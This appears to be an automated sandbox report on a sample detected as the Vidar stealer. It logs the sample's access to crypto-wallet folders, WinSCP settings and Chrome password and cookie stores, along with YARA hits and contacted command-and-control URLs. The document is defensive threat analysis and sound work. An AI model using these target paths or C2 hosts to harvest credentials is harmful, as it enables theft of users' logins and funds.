Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????? Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????? Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectronCashtxtO
Source: T6zZFfRLqs.exe String found in binary or memory: JaxxLiberty
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\window-state.jsonw
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ExodusENT
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\MultiDogeENTCURRENTr
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??'
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491601 Sample: T6zZFfRLqs.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Yara detected Vidar 2->36 38 Yara detected Vidar stealer 2->38 40 2 other signatures 2->40 7 T6zZFfRLqs.exe 75 2->7         started        process3 dnsIp4 28 mas.to 88.99.75.82, 443, 49740 HETZNER-ASDE Germany 7->28 30 23.88.105.196, 49741, 80 ENZUINC-US United States 7->30 32 192.168.2.1 unknown unknown 7->32 20 C:\Users\user\AppData\...\msvcp140[1].dll, PE32 7->20 dropped 22 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->22 dropped 24 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 7->24 dropped 26 9 other files (none is malicious) 7->26 dropped 42 Detected unpacking (changes PE section rights) 7->42 44 Detected unpacking (overwrites its own PE header) 7->44 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 7->46 48 3 other signatures 7->48 12 cmd.exe 1 7->12         started        file5 signatures6 process7 process8 14 taskkill.exe 1 12->14         started        16 conhost.exe 12->16         started        18 timeout.exe 1 12->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
88.99.75.82
 mas.to Germany
24940 HETZNER-ASDE false
23.88.105.196
 unknown United States
18978 ENZUINC-US false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
mas.to 88.99.75.82 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://23.88.105.196/nss3.dll false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/freebl3.dll false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/msvcp140.dll false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/mozglue.dll false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/softokn3.dll false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/vcruntime140.dll false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/ false
  • Avira URL Cloud: safe
 unknown
http://23.88.105.196/1008 false
  • Avira URL Cloud: safe
 unknown
https://mas.to/@killern0 false
  • Avira URL Cloud: safe
 unknown